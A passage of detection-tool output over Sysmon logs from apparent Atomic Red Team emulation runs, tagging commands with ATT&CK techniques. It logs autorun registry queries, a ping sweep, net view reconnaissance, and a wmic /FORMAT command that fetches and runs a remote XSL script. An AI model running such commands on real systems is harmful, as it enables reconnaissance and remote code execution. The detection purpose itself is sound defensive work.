C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3703 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.956 + 747F3D96-D87C-5D31-0000-0010056E3100 + 4220 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3701 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.900 + 747F3D96-D87C-5D31-0000-00107C693100 + 1740 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3699 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.842 + 747F3D96-D87C-5D31-0000-0010E1643100 + 5936 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3697 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.775 + 747F3D96-D87C-5D31-0000-001056603100 + 6832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3773 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:34.991 + 747F3D96-D8F6-5D31-0000-001091D13300 + 4528 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3772 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:34.779 + 747F3D96-D8F6-5D31-0000-00100FCB3300 + 3344 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3771 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.330 + 747F3D96-D8EA-5D31-0000-00108AB83300 + 4684 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3771 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.330 + 747F3D96-D8EA-5D31-0000-00108AB83300 + 4684 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3770 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.302 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "net view" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3769 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.839 + 747F3D96-D8DD-5D31-0000-001043953300 + 3012 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view /domain + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view /domain" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3769 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.839 + 747F3D96-D8DD-5D31-0000-001043953300 + 3012 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view /domain + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view /domain" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view /domain" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3768 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.804 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "net view /domain" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3767 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.873 + 747F3D96-D8DA-5D31-0000-00100D8A3300 + 4016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3766 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.748 + 747F3D96-D8DA-5D31-0000-001029863300 + 3220 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3765 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.714 + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3765 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.714 + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 988 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + technique_id=T1059.003,technique_name=Windows Command Shell + 2020-10-20 11:50:56.472 + 23F38D93-CF20-5F8E-D008-000000000C00 + 9620 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + DESKTOP-NTSSLJD\den + 23F38D93-AE9B-5F8E-A2EC-170000000000 + 0x17eca2 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 23F38D93-CF20-5F8E-CE08-000000000C00 + 6896 + C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe + C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3764 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:56.162 + 747F3D96-D8D0-5D31-0000-001034673300 + 396 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3763 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:56.021 + 747F3D96-D8D0-5D31-0000-0010F3623300 + 7040 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic.exe process /FORMAT:list + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3762 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:55.978 + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3762 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:55.978 + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 